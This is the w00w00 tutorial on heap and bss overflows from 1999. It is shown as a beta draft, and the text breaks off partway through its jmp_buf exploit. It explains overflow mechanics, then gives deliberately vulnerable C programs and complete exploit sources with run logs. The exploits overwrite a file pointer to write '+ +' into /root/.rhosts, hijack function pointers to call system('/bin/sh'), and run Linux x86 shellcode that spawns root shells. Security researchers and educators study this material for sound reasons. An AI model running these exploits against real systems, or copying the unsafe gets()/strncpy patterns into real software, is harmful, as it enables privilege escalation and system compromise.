Subject: w00w00 on Heap Overflows

This is a PRELIMINARY BETA VERSION of our final article! We apologize for
any mistakes. We still need to add a few more things.

[ Note: You may also get this article off of  ]
[ http://www.w00w00.org/articles.html.        ]

w00w00 on Heap Overflows
By: Matt Conover (a.k.a. Shok) & w00w00 Security Team

------------------------------------------------------------------------------

Copyright (C) January 1999, Matt Conover & w00w00 Security Development

You may freely redistribute or republish this article, provided the
following conditions are met:

   1. This article is left intact (no changes made, the full article
      published, etc.)
   2. Proper credit is given to its authors: Matt Conover (Shok) and the
      w00w00 Security Development (WSD).

You are free to rewrite your own articles based on this material (assuming
the above conditions are met). It'd also be appreciated if an e-mail is
sent to either mattc@repsec.com or shok@dataforce.net to let us know you
are going to be republishing this article or writing an article based upon
one of our ideas.

------------------------------------------------------------------------------

Prelude: Heap/BSS-based overflows are fairly common in applications today,
yet they are rarely reported. Therefore, we felt it was appropriate to
present a "heap overflow" tutorial. The biggest critics of this article
will probably be those who argue heap overflows have been around for a
while. Of course they have, but that doesn't negate the need for such
material.

In this article, we will refer to "overflows involving the stack" as
"stack-based overflows" ("stack overflow" is misleading) and "overflows
involving the heap" as "heap-based overflows". This article should provide
the following: a better understanding of heap-based overflows, several
methods of exploitation, demonstrations, and some possible solutions/fixes.
Prerequisites to this article: a general understanding of computer
architecture, assembly, C, and stack overflows.

This is a collection of the insights we have gained through our research
with heap-based overflows and the like. We have written all the examples
and exploits included in this article; therefore, the copyright applies to
them as well.

Why Heap/BSS Overflows are Significant
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

As more system vendors add non-executable stack patches, or individuals
apply their own patches (e.g., Solar Designer's non-executable stack
patch), a different method of penetration is needed by security
consultants (or else, we won't have jobs!). Let me give you a few
examples:

   1. Searching for the word "heap" on BugTraq (for the archive, see
      www.geek-girl.com/bugtraq) yields only 40+ matches, whereas "stack"
      yields 2300+ matches (though several are irrelevant). Also, "stack
      overflow" gives twice as many matches as "heap" does.

   2. On Solaris (an OS developed by Sun Microsystems), as of Solaris
      2.6, sparc Solaris includes a "protect_stack" option, but no
      equivalent "protect_heap" option. Fortunately, the bss is not
      executable (and need not be).

   3. There is a "StackGuard" (developed by Crispin Cowan et al.), but no
      equivalent "HeapGuard".

   4. Using a heap/bss-based overflow was one of the "potential" methods
      of getting around StackGuard. The following was posted to BugTraq
      by Tim Newsham several months ago:

      > Finally the precomputed canary values may be a target
      > themselves. If there is an overflow in the data or bss segments
      > preceding the precomputed canary vector, an attacker can simply
      > overwrite all the canary values with a single value of his
      > choosing, effectively turning off stack protection.

   5. Some people have actually suggested making a "local" buffer a
      "static" buffer as a fix! This is not very wise; it reflects a
      fairly common misconception of how the heap and bss work.
Although heap-based overflows are not new, they don't seem to be well
understood.

Note: One argument is that a presentation of heap-based overflows is
equivalent to a presentation of stack-based overflows. However, only a
small proportion of this article overlaps with what a stack-based
overflow presentation would cover.

People go out of their way to prevent stack-based overflows, but leave
their heaps/bss' completely open! On most systems, the heap and bss are
both executable and writeable (an excellent combination). This makes
heap/bss overflows very possible. But, I don't see any reason for the bss
to be executable! What is going to be executed in zero-filled memory?!

For the security consultant (the one doing the penetration assessment),
most heap-based overflows are system and architecture independent,
including those against non-executable heaps. This will all be
demonstrated in the "Exploiting Heap/BSS Overflows" section.

Terminology
~~~~~~~~~~~

An executable file, such as an ELF (Executable and Linking Format)
executable, has several "sections", such as: the PLT (Procedure Linking
Table), GOT (Global Offset Table), init (instructions executed on
initialization), fini (instructions to be executed upon termination), and
ctors and dtors (which contain global constructors/destructors).

"Memory that is dynamically allocated by the application is known as the
heap." The words "by the application" are important here: on good systems
most areas are in fact dynamically allocated at the kernel level, while
for the heap, the allocation is requested by the application.

Heap and Data/BSS Sections
~~~~~~~~~~~~~~~~~~~~~~~~~~

The heap is an area in memory that is dynamically allocated by the
application. The data section is initialized at compile-time. The bss
section contains uninitialized data, and is allocated at run-time. Until
it is written to, it remains zeroed (at least from the application's
point of view).
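The three regions described above can be seen from a short C sketch (this
is our illustration, not part of the original article; the function names
are ours):

```c
#include <stdlib.h>

int data_var = 42;          /* data section: initialized at compile-time */
int bss_var;                /* bss section: zero until first written */

/* C guarantees static-duration objects start zeroed, which matches the
 * bss description above. */
int bss_starts_zeroed(void)
{
    return bss_var == 0;
}

/* The heap is the only one of the three allocated at the application's
 * explicit request. */
int heap_alloc_works(void)
{
    int *p = malloc(sizeof *p);
    int ok = (p != NULL);

    free(p);
    return ok;
}
```

Printing the addresses of `data_var`, `bss_var`, and a malloc'd pointer
from a `main()` will show the data, bss, and heap regions on a typical
Unix layout.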
Note: When we refer to a "heap-based overflow" in the sections below, we
are most likely referring to buffer overflows of both the heap and
data/bss sections.

On most systems, the heap grows up (towards higher addresses). Hence,
when we say "X is below Y," it means X is lower in memory than Y.

Exploiting Heap/BSS Overflows
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

In this section, we'll cover several different methods to put heap/bss
overflows to use. Most of the examples are for Unix-derived x86 systems,
but will also work in DOS and Windows (with a few changes). We've also
included a few DOS/Windows-specific exploitation methods. An advance
warning: this will be the longest section, and should be studied the
most.

Note: In this article, I use the "exact offset" approach, where the
offset must be closely approximated to its actual value. The alternative
is the "stack-based overflow approach" (if you will), where one repeats
the addresses to increase the likelihood of a successful exploit.

While the first example may seem unnecessary, we're including it for
those who are unfamiliar with heap-based overflows.
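The address-repetition alternative mentioned in the note can be sketched
in a few lines (ours, not from the article; 0x41424344 is an arbitrary
stand-in value, not a real address):

```c
#include <string.h>

/* Fill buf with `addr` repeated back to back, so that a pointer sitting
 * at any addr-sized-aligned offset inside the payload still receives the
 * address even if the exact offset was guessed wrong. */
void fill_repeated(unsigned char *buf, size_t len, unsigned long addr)
{
    size_t i;

    for (i = 0; i + sizeof(addr) <= len; i += sizeof(addr))
        memcpy(buf + i, &addr, sizeof(addr));
}

/* Check whether the slot at `off` holds the repeated address. */
int slot_matches(const unsigned char *buf, size_t off, unsigned long addr)
{
    return memcmp(buf + off, &addr, sizeof(addr)) == 0;
}
```

With the exact-offset approach used in this article, only one slot is
written; repeating it simply trades payload space for tolerance.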
Therefore, we'll include this quick demonstration:

-----------------------------------------------------------------------------
/* demonstrates dynamic overflow in heap (initialized data) */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define BUFSIZE 16
#define OVERSIZE 8 /* overflow buf2 by OVERSIZE bytes */

int main()
{
   u_long diff;
   char *buf1 = (char *)malloc(BUFSIZE), *buf2 = (char *)malloc(BUFSIZE);

   diff = (u_long)buf2 - (u_long)buf1;
   printf("buf1 = %p, buf2 = %p, diff = 0x%x bytes\n", buf1, buf2, diff);

   memset(buf2, 'A', BUFSIZE-1), buf2[BUFSIZE-1] = '\0';

   printf("before overflow: buf2 = %s\n", buf2);
   memset(buf1, 'B', (u_int)(diff + OVERSIZE));
   printf("after overflow: buf2 = %s\n", buf2);

   return 0;
}
-----------------------------------------------------------------------------

If we run this, we'll get the following:

   [root /w00w00/heap/examples/basic]# ./heap1 8
   buf1 = 0x804e000, buf2 = 0x804eff0, diff = 0xff0 bytes
   before overflow: buf2 = AAAAAAAAAAAAAAA
   after overflow: buf2 = BBBBBBBBAAAAAAA

This works because buf1 overruns its boundaries into buf2's heap space.
But, because buf2's heap space is still valid (heap) memory, the program
doesn't crash.

Note: A possible fix for a heap-based overflow, which will be mentioned
later, is to put "canary" values between all variables on the heap space
(like those of StackGuard, mentioned later) that mustn't be changed
throughout execution.

You can get the complete source to all examples used in this article from
the file attachment, heaptut.tgz. You can also download this from our
article archive at http://www.w00w00.org/articles.html.

Note: To demonstrate a bss-based overflow, change the line
   from: 'char *buf1 = (char *)malloc(BUFSIZE)'
   to:   'static char buf1[BUFSIZE]'

Yes, that was a very basic example, but we wanted to demonstrate a heap
overflow at its most primitive level. This is the basis of almost all
heap-based overflows.
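The same effect, "write past one buffer's end, land in the data placed
after it", can be shown in a strictly-defined miniature (ours, not from
the article): both fields live in one struct and the write goes through a
byte pointer, so unlike a real overflow this stays well-defined C.

```c
#include <string.h>

struct layout {
    char buf[16];      /* the "overflowed" buffer, like buf1 above */
    char victim[16];   /* the adjacent data, like buf2 above */
};

/* Write n 'B' bytes starting at the front of the struct; any n > 16
 * spills past buf into victim, just as the memset in heap1.c spills
 * past buf1 into buf2. Clamped so the write stays inside the object. */
void overflowing_write(struct layout *s, size_t n)
{
    if (n > sizeof(*s))
        n = sizeof(*s);
    memset((unsigned char *)s, 'B', n);
}
```

Since `victim` is a char array, it sits at offset 16 with no padding, so
a 24-byte write replaces its first 8 bytes.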
We can use it to overwrite a filename, a password, a saved uid, etc. Here
is a (still primitive) example of manipulating pointers:

-----------------------------------------------------------------------------
/* demonstrates static pointer overflow in bss (uninitialized data) */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>

#define BUFSIZE 16
#define ADDRLEN 4 /* # of bytes in an address */

int main()
{
   u_long diff;
   static char buf[BUFSIZE], *bufptr;

   bufptr = buf, diff = (u_long)&bufptr - (u_long)buf;

   printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n",
          &bufptr, bufptr, buf, diff, diff);

   memset(buf, 'A', (u_int)(diff + ADDRLEN));

   printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n",
          &bufptr, bufptr, buf, diff, diff);

   return 0;
}
-----------------------------------------------------------------------------

The results:

   [root /w00w00/heap/examples/basic]# ./heap3
   bufptr (0x804a860) = 0x804a850, buf = 0x804a850, diff = 0x10 (16) bytes
   bufptr (0x804a860) = 0x41414141, buf = 0x804a850, diff = 0x10 (16) bytes

When run, one clearly sees that the pointer now points to a different
address. One use of this: we could overwrite a temporary filename pointer
to point to a separate string (such as argv[1], which we could supply
ourselves), which could contain "/root/.rhosts". Hopefully, you are
starting to see some potential uses.

To demonstrate this, we will use a temporary file to momentarily save
some input from the user. This is our finished "vulnerable program":

-----------------------------------------------------------------------------
/*
 * This is a typical vulnerable program. It will store user input in a
 * temporary file.
 *
 * Compile as: gcc -o vulprog1 vulprog1.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>

#define ERROR -1
#define BUFSIZE 16

/*
 * Run this vulprog as root or change the "vulfile" to something else.
 * Otherwise, even if the exploit works, it won't have permission to
 * overwrite /root/.rhosts (the default "example").
 */
int main(int argc, char **argv)
{
   FILE *tmpfd;
   static char buf[BUFSIZE], *tmpfile;

   if (argc <= 1)
   {
      fprintf(stderr, "Usage: %s <garbage>\n", argv[0]);
      exit(ERROR);
   }

   tmpfile = "/tmp/vulprog.tmp"; /* no, this is not a temp file vul */
   printf("before: tmpfile = %s\n", tmpfile);

   printf("Enter one line of data to put in %s: ", tmpfile);
   gets(buf);

   printf("\nafter: tmpfile = %s\n", tmpfile);

   tmpfd = fopen(tmpfile, "w");
   if (tmpfd == NULL)
   {
      fprintf(stderr, "error opening %s: %s\n", tmpfile,
              strerror(errno));
      exit(ERROR);
   }

   fputs(buf, tmpfd);
   fclose(tmpfd);

   return 0;
}
-----------------------------------------------------------------------------

The aim of this "example" program is to demonstrate that something of
this nature can easily occur in programs (although hopefully not in
setuid or root-owned daemon servers).

And here is our exploit for the vulnerable program:

-----------------------------------------------------------------------------
/*
 * Copyright (C) January 1999, Matt Conover & WSD
 *
 * This will exploit vulprog1.c. It passes some arguments to the
 * program (that the vulnerable program doesn't use). The vulnerable
 * program expects us to enter one line of input to be stored
 * temporarily. However, because of a static buffer overflow, we can
 * overwrite the temporary filename pointer, to have it point to
 * argv[1] (which we could pass as "/root/.rhosts"). Then it will
 * write our temporary line to this file. So our overflow string (what
 * we pass as our input line) will be:
 *
 *   "+ +\t# ", then (tmpfile addr - buf addr) A's, then argv[1]'s address
 *
 * We use "+ +" (all hosts), followed by '#' (comment indicator), to
 * prevent our "attack code" from causing problems. Without the
 * "#", programs using .rhosts would misinterpret our attack code.
 *
 * Compile as: gcc -o exploit1 exploit1.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define ERROR -1
#define BUFSIZE 256

#define DIFF 16 /* estimated diff between buf/tmpfile in vulprog */
#define VULPROG "./vulprog1"
#define VULFILE "/root/.rhosts" /* the file 'buf' will be stored in */

/* get value of sp off the stack (used to calculate argv[1] address) */
u_long getesp()
{
   __asm__("movl %esp,%eax"); /* equiv. of 'return esp;' in C */
}

int main(int argc, char **argv)
{
   u_long addr;
   register int i;
   int mainbufsize;

   char *mainbuf, buf[DIFF+6+1] = "+ +\t# ";

   /* ------------------------------------------------------ */
   if (argc <= 1)
   {
      fprintf(stderr, "Usage: %s <offset> [try 310-330]\n", argv[0]);
      exit(ERROR);
   }
   /* ------------------------------------------------------ */

   memset(buf, 0, sizeof(buf)), strcpy(buf, "+ +\t# ");
   memset(buf + strlen(buf), 'A', DIFF);
   addr = getesp() + atoi(argv[1]);

   /* reverse byte order (on a little endian system) */
   for (i = 0; i < sizeof(u_long); i++)
      buf[DIFF + i] = ((u_long)addr >> (i * 8) & 255);

   mainbufsize = strlen(buf) + strlen(VULPROG) + strlen(VULFILE) + 13;

   mainbuf = (char *)malloc(mainbufsize);
   memset(mainbuf, 0, mainbufsize);

   snprintf(mainbuf, mainbufsize - 1, "echo '%s' | %s %s\n",
            buf, VULPROG, VULFILE);

   printf("Overflowing tmpaddr to point to %p, check %s after.\n\n",
          addr, VULFILE);

   system(mainbuf);
   return 0;
}
-----------------------------------------------------------------------------

Here's what happens when we run it:

   [root /w00w00/heap/examples/vulpkgs/vulpkg1]# ./exploit1 320
   Overflowing tmpaddr to point to 0xbffffd60, check /root/.rhosts after.

   before: tmpfile = /tmp/vulprog.tmp
   Enter one line of data to put in /tmp/vulprog.tmp:
   after: tmpfile = /vulprog1

Well, we can see that's part of argv[0] ("./vulprog1"), so we know we are
close:

   [root /w00w00/heap/examples/vulpkgs/vulpkg1]# ./exploit1 330
   Overflowing tmpaddr to point to 0xbffffd6a, check /root/.rhosts after.
   before: tmpfile = /tmp/vulprog.tmp
   Enter one line of data to put in /tmp/vulprog.tmp:
   after: tmpfile = /root/.rhosts

   [root /tmp/heap/examples/advanced/vul-pkg1]#

Got it! The exploit overwrites the buffer that the vulnerable program
uses for gets() input. At the end of its buffer, it places the address
where we assume argv[1] of the vulnerable program is. That is, we
overwrite everything between the overflowed buffer and the tmpfile
pointer.

We ascertained the tmpfile pointer's location in memory by sending
arbitrary lengths of "A"'s until we discovered how many "A"'s it took to
reach the start of tmpfile's address. Also, if you have source to the
vulnerable program, you can add a printf() to print out the
addresses/offsets between the overflowed data and the target data (i.e.,
'printf("%p - %p = 0x%lx bytes\n", buf2, buf1, (u_long)diff)').

(Un)fortunately, the offsets usually change at compile-time (as far as I
know), but we can easily recalculate, guess, or "brute force" the
offsets.

Note: Now that we need a valid address (argv[1]'s address), we must
reverse the byte order for little endian systems. Little endian systems
store the least significant byte first (x86 is little endian), so that
0x12345678 is stored in memory as the bytes 0x78 0x56 0x34 0x12. On a big
endian system (such as a sparc), we could drop the byte-reversal code and
leave the addresses alone.

Further note: So far none of these examples has required an executable
heap! As I briefly mentioned in the "Why Heap/BSS Overflows are
Significant" section, these previous examples (with the exception of the
address byte order) were all system/architecture independent. This is
useful in exploiting heap-based overflows.

With knowledge of how to overwrite pointers, we're going to show how to
modify function pointers. The downside to exploiting function pointers
(and the others to follow) is that they require an executable heap.
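The byte-reversal loop that recurs throughout these exploits can be
isolated into a little sketch (ours, not from the article):

```c
/* Store a 32-bit address least-significant byte first, as a little
 * endian x86 expects it in memory. This is the same expression the
 * exploits above use: buf[i] = (addr >> (i * 8)) & 255, for i = 0..3. */
void store_le32(unsigned char *buf, unsigned long addr)
{
    int i;

    for (i = 0; i < 4; i++)
        buf[i] = (unsigned char)((addr >> (i * 8)) & 255);
}
```

On a big endian machine the bytes would simply be copied in the opposite
order, which is why that code can be dropped there.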
A function pointer (e.g., "int (*funcptr)(char *str)") allows a
programmer to dynamically modify which function is called. We can
overwrite a function pointer by overwriting its address, so that when
it's executed, it calls the function we point it to instead. This is good
news, because we have several options. First, we can include our own
shellcode, and do one of the following with it:

   1. argv[] method: store the shellcode in an argument to the program
      (requiring an executable stack)

   2. heap offset method: offset from the top of the heap to the
      estimated address of the target/overflow buffer (requiring an
      executable heap)

Note: There is a greater probability of the heap being executable than
the stack on any given system. Therefore, the heap method will probably
work more often.

A second method is to simply guess (though it's inefficient) the address
of a function, using an estimated offset of that in the vulnerable
program. Also, if we know the address of system() in our own program, it
will be at a very close offset, assuming both vulprog/exploit were
compiled the same way. The advantage is that neither an executable stack
nor an executable heap is required.

Note: Another method is to use the PLT (Procedure Linking Table), which
stores the addresses of library functions. I first learned the PLT method
from str (stranJer) in a non-executable stack exploit for sparc.

The reason the second method is preferred is simplicity. We can guess the
offset of system() in the vulprog from the address of system() in our
exploit fairly quickly. This works the same way on remote systems
(assuming similar versions, operating systems, and architectures).

With the stack method, the advantage is that we can do whatever we want,
and we don't require compatible function pointers (i.e., char
(*funcptr)(int a) and void (*funcptr)() would work the same). The
disadvantage (as mentioned earlier) is that it requires an executable
stack.
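The core mechanism, a buffer sitting directly below a function pointer,
can be shown as a strictly-defined miniature (ours, not from the article;
the "evil" target stands in for shellcode, and the byte copy through the
struct stands in for the overflow):

```c
#include <stddef.h>
#include <string.h>

static int goodfunc(void) { return 1; }     /* intended target */
static int evilfunc(void) { return 666; }   /* attacker's target */

struct victim {
    char buf[16];            /* overflowed buffer */
    int (*funcptr)(void);    /* sits above buf, like in vulprog below */
};

/* Simulate an overflow whose payload ends with the raw bytes of the
 * address the attacker wants funcptr to hold: after the overwrite, the
 * next call through funcptr goes wherever those bytes point. */
int call_after_overwrite(int (*newtarget)(void))
{
    struct victim v;

    v.funcptr = goodfunc;
    memcpy((unsigned char *)&v + offsetof(struct victim, funcptr),
           &newtarget, sizeof(newtarget));
    return v.funcptr();
}
```

A real exploit does the same overwrite by writing past `buf`'s end; only
the delivery differs.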
Here is our vulnerable program for the following 2 exploits:

-----------------------------------------------------------------------------
/*
 * Just the vulnerable program we will exploit.
 * Compile as: gcc -o vulprog vulprog.c (or change exploit macros)
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define ERROR -1
#define BUFSIZE 64

int goodfunc(const char *str); /* funcptr starts out as this */

int main(int argc, char **argv)
{
   static char buf[BUFSIZE];
   static int (*funcptr)(const char *str);

   if (argc <= 2)
   {
      fprintf(stderr, "Usage: %s <buf> <goodfunc arg>\n", argv[0]);
      exit(ERROR);
   }

   printf("(for 1st exploit) system() = %p\n", system);
   printf("(for 2nd exploit, stack method) argv[2] = %p\n", argv[2]);
   printf("(for 2nd exploit, heap offset method) buf = %p\n\n", buf);

   funcptr = (int (*)(const char *))goodfunc;
   printf("before overflow: funcptr points to %p\n", funcptr);

   memset(buf, 0, sizeof(buf));
   strncpy(buf, argv[1], strlen(argv[1]));
   printf("after overflow: funcptr points to %p\n", funcptr);

   (void)(*funcptr)(argv[2]);
   return 0;
}

/* ---------------------------------------------- */

/* This is what funcptr would point to if we didn't overflow it */
int goodfunc(const char *str)
{
   printf("\nHi, I'm a good function. I was passed: %s\n", str);
   return 0;
}
-----------------------------------------------------------------------------

Our first example is the system() method:

-----------------------------------------------------------------------------
/*
 * Copyright (C) January 1999, Matt Conover & WSD
 *
 * Demonstrates overflowing/manipulating static function pointers in
 * the bss (uninitialized data) to execute functions.
 *
 * Try an offset (argv[1]) in the range of 0-20 (10-16 is best)
 * To compile use: gcc -o exploit1 exploit1.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define ERROR -1
#define BUFSIZE 64 /* the estimated diff between funcptr/buf */

#define VULPROG "./vulprog" /* vulnerable program location */
#define CMD "/bin/sh" /* command to execute if successful */

int main(int argc, char **argv)
{
   register int i;
   u_long sysaddr;
   static char buf[BUFSIZE + sizeof(u_long) + 1] = {0};

   if (argc <= 1)
   {
      fprintf(stderr, "Usage: %s <offset>\n", argv[0]);
      fprintf(stderr, "[offset = estimated system() offset]\n\n");
      exit(ERROR);
   }

   sysaddr = (u_long)&system - atoi(argv[1]);
   printf("trying system() at 0x%lx\n", sysaddr);

   memset(buf, 'A', BUFSIZE);

   /* reverse byte order (on a little endian system) (ntohl equiv) */
   for (i = 0; i < sizeof(sysaddr); i++)
      buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255;

   execl(VULPROG, VULPROG, buf, CMD, NULL);
   return 0;
}
-----------------------------------------------------------------------------

When we run this with an offset of 16 (which may vary) we get:

   [root /w00w00/heap/examples]# ./exploit1 16
   trying system() at 0x80484d0
   (for 1st exploit) system() = 0x80484d0
   (for 2nd exploit, stack method) argv[2] = 0xbffffd3c
   (for 2nd exploit, heap offset method) buf = 0x804a9a8

   before overflow: funcptr points to 0x8048770
   after overflow: funcptr points to 0x80484d0
   bash#

And our second example, using both the argv[] and heap offset methods:

-----------------------------------------------------------------------------
/*
 * Copyright (C) January 1999, Matt Conover & WSD
 *
 * This demonstrates how to exploit a static buffer to point a
 * function pointer at argv[] to execute shellcode. This requires
 * an executable heap to succeed.
 *
 * The exploit takes two arguments (the offset and "heap"/"stack").
 * For the argv[] method, it's an estimated offset to argv[2] from
 * the stack top.
 * For the heap offset method, it's an estimated offset
 * to the target/overflow buffer from the heap top.
 *
 * Try values somewhere between 325-345 for the argv[] method, and
 * 420-450 for heap.
 *
 * To compile use: gcc -o exploit2 exploit2.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define ERROR -1
#define BUFSIZE 64 /* estimated diff between buf/funcptr */

#define VULPROG "./vulprog" /* where the vulprog is */

char shellcode[] = /* just aleph1's old shellcode (linux x86) */
   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0"
   "\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
   "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

u_long getesp()
{
   __asm__("movl %esp,%eax"); /* set sp as return value */
}

int main(int argc, char **argv)
{
   register int i;
   u_long sysaddr;
   char buf[BUFSIZE + sizeof(u_long) + 1];

   if (argc <= 2)
   {
      fprintf(stderr, "Usage: %s <offset> <heap | stack>\n", argv[0]);
      exit(ERROR);
   }

   if (strncmp(argv[2], "stack", 5) == 0)
   {
      printf("Using stack for shellcode (requires exec. stack)\n");

      sysaddr = getesp() + atoi(argv[1]);
      printf("Using 0x%lx as our argv[1] address\n\n", sysaddr);

      memset(buf, 'A', BUFSIZE + sizeof(u_long));
   }

   else
   {
      printf("Using heap buffer for shellcode "
             "(requires exec. heap)\n");

      sysaddr = (u_long)sbrk(0) - atoi(argv[1]);
      printf("Using 0x%lx as our buffer's address\n\n", sysaddr);

      if (BUFSIZE + 4 + 1 < strlen(shellcode))
      {
         fprintf(stderr, "error: buffer is too small for shellcode "
                 "(min. = %d bytes)\n", strlen(shellcode));
         exit(ERROR);
      }

      strcpy(buf, shellcode);
      memset(buf + strlen(shellcode), 'A',
             BUFSIZE - strlen(shellcode) + sizeof(u_long));
   }

   buf[BUFSIZE + sizeof(u_long)] = '\0';

   /* reverse byte order (on a little endian system) (ntohl equiv) */
   for (i = 0; i < sizeof(sysaddr); i++)
      buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255;

   execl(VULPROG, VULPROG, buf, shellcode, NULL);
   return 0;
}
-----------------------------------------------------------------------------

When we run this with an offset of 334 for the argv[] method we get:

   [root /w00w00/heap/examples] ./exploit2 334 stack
   Using stack for shellcode (requires exec. stack)
   Using 0xbffffd16 as our argv[1] address

   (for 1st exploit) system() = 0x80484d0
   (for 2nd exploit, stack method) argv[2] = 0xbffffd16
   (for 2nd exploit, heap offset method) buf = 0x804a9a8

   before overflow: funcptr points to 0x8048770
   after overflow: funcptr points to 0xbffffd16
   bash#

When we run this with an offset of 428-442 for the heap offset method we
get:

   [root /w00w00/heap/examples] ./exploit2 428 heap
   Using heap buffer for shellcode (requires exec. heap)
   Using 0x804a9a8 as our buffer's address

   (for 1st exploit) system() = 0x80484d0
   (for 2nd exploit, stack method) argv[2] = 0xbffffd16
   (for 2nd exploit, heap offset method) buf = 0x804a9a8

   before overflow: funcptr points to 0x8048770
   after overflow: funcptr points to 0x804a9a8
   bash#

Note: Another advantage of the heap method is that you have a large
working range. With the argv[] (stack) method, the offset needed to be
exact. With the heap offset method, any offset between 428-442 worked.

As you can see, there are several different methods to exploit the same
problem. As an added bonus, we'll include a final type of exploitation
that uses jmp_bufs (setjmp/longjmp). jmp_bufs basically store a stack
frame, and jump to it at a later point in execution.
If we get a chance to overflow a buffer between the setjmp() and
longjmp() calls, and the jmp_buf lies above the overflowed buffer, this
can be exploited. We can set these up to emulate the behavior of a
stack-based overflow (as does the argv[] shellcode method used earlier,
also). The jmp_buf layout below is for an x86 system; it will need to be
modified for other architectures accordingly.

First we will include a vulnerable program again:

-----------------------------------------------------------------------------
/*
 * This is just a basic vulnerable program to demonstrate
 * how to overwrite/modify jmp_buf's to modify the course of
 * execution.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <setjmp.h>

#define ERROR -1
#define BUFSIZE 16

static char buf[BUFSIZE];
jmp_buf jmpbuf;

u_long getesp()
{
   __asm__("movl %esp,%eax"); /* the return value goes in %eax */
}

int main(int argc, char **argv)
{
   if (argc <= 2)
   {
      fprintf(stderr, "Usage: %s <string1> <string2>\n", argv[0]);
      exit(ERROR);
   }

   printf("[vulprog] argv[2] = %p\n", argv[2]);
   printf("[vulprog] sp = 0x%lx\n\n", getesp());

   if (setjmp(jmpbuf)) /* if > 0, we got here from longjmp() */
   {
      fprintf(stderr, "error: exploit didn't work\n");
      exit(ERROR);
   }

   printf("before:\n");
   printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n",
          jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di);

   printf("bp = %p, sp = %p, pc = %p\n\n",
          jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc);

   strncpy(buf, argv[1], strlen(argv[1])); /* actual copy here */

   printf("after:\n");
   printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n",
          jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di);

   printf("bp = %p, sp = %p, pc = %p\n\n",
          jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc);

   longjmp(jmpbuf, 1);
   return 0;
}
-----------------------------------------------------------------------------

The reason we have the vulnerable program output its stack pointer (esp
on x86) is that it makes "guessing" easier for the novice.
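As a refresher on the control flow being abused here (our sketch, not
from the article): longjmp() resumes execution at the matching setjmp(),
which then returns the value passed to longjmp(). A corrupted jmp_buf
instead "resumes" wherever its saved sp/pc point, which is the whole
exploit.

```c
#include <setjmp.h>

static jmp_buf env;

static void do_longjmp(void)
{
    longjmp(env, 1);   /* never returns; control reappears at setjmp() */
}

int jump_demo(void)
{
    volatile int steps = 0;   /* volatile: value must survive longjmp() */

    if (setjmp(env) == 0) {   /* returns 0 on the direct call */
        steps = 1;
        do_longjmp();
        return -1;            /* never reached */
    }

    /* nonzero return value: we got here from longjmp() */
    return steps + 1;
}
```

jump_demo() returns 2: the body ran once, then longjmp() brought control
back through setjmp() a second time.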
And now the exploit for it (you should be able to follow it):

-----------------------------------------------------------------------------
/*
 * Copyright (C) January 1999, Matt Conover & WSD
 *
 * Demonstrates a method of overwriting jmpbuf's (setjmp/longjmp)
 * to emulate a stack-based overflow in the heap. By that I mean,
 * you would overflow the sp/pc of the jmpbuf. When longjmp() is
 * called, it will execute the next instruction at that address.
 * Therefore, we can stick shellcode at this address (as the data/heap
 * section on most systems is executable), and it will be executed.
 *
 * This takes two arguments (offsets):
 *   arg 1 - stack offset (should be about 25-45).
 *   arg 2 - argv offset (should be about 310-330).
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define ERROR -1
#define BUFSIZE 16
#define VULPROG "./vulprog4"

char shellcode[] = /* just aleph1's old shellcode (linux x86) */
   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0"
   "\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
   "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

u_long getesp()
{
   __asm__("movl %esp,%eax"); /* the return value goes in %eax */
}

int main(int argc, char **argv)
{
   int stackaddr, argvaddr;
   register int index, i, j;

   char buf[BUFSIZE + 24 + 1];

   if (argc <= 2)
   {
      fprintf(stderr, "Usage: %s <stack offset> <argv offset>\n",
              argv[0]);
      fprintf(stderr, "[stack offset = offset to stack of vulprog]\n");
      fprintf(stderr, "[argv offset = offset to argv[2]]\n");
      exit(ERROR);
   }

   stackaddr = getesp() - atoi(argv[1]);
   argvaddr = getesp() + atoi(argv[2]);

   printf("trying address 0x%lx for argv[2]\n", argvaddr);
   printf("trying address 0x%lx for sp\n\n", stackaddr);

   /*
    * The second memset() is needed, because otherwise some values
    * will be (null) and the longjmp() won't do our shellcode.
    */
   memset(buf, 'A', BUFSIZE), memset(buf + BUFSIZE + 4, 0x1, 12);
   buf[BUFSIZE+24] = '\0';

   /* ------------------------------------- */

   /*
    * We need the stack pointer, because to set pc to our shellcode
    * address, we have to overwrite the stack pointer for jmpbuf.
    * Therefore, we'll rewrite it with the real address again.
    */

   /* reverse byte order (on a little endian system) (ntohl equiv) */
   for (i = 0; i < sizeof(u_long); i++) /* setup BP */
   {
      index = BUFSIZE + 16 + i;
      buf[index] = (stackaddr >> (i * 8)) & 255;
   }

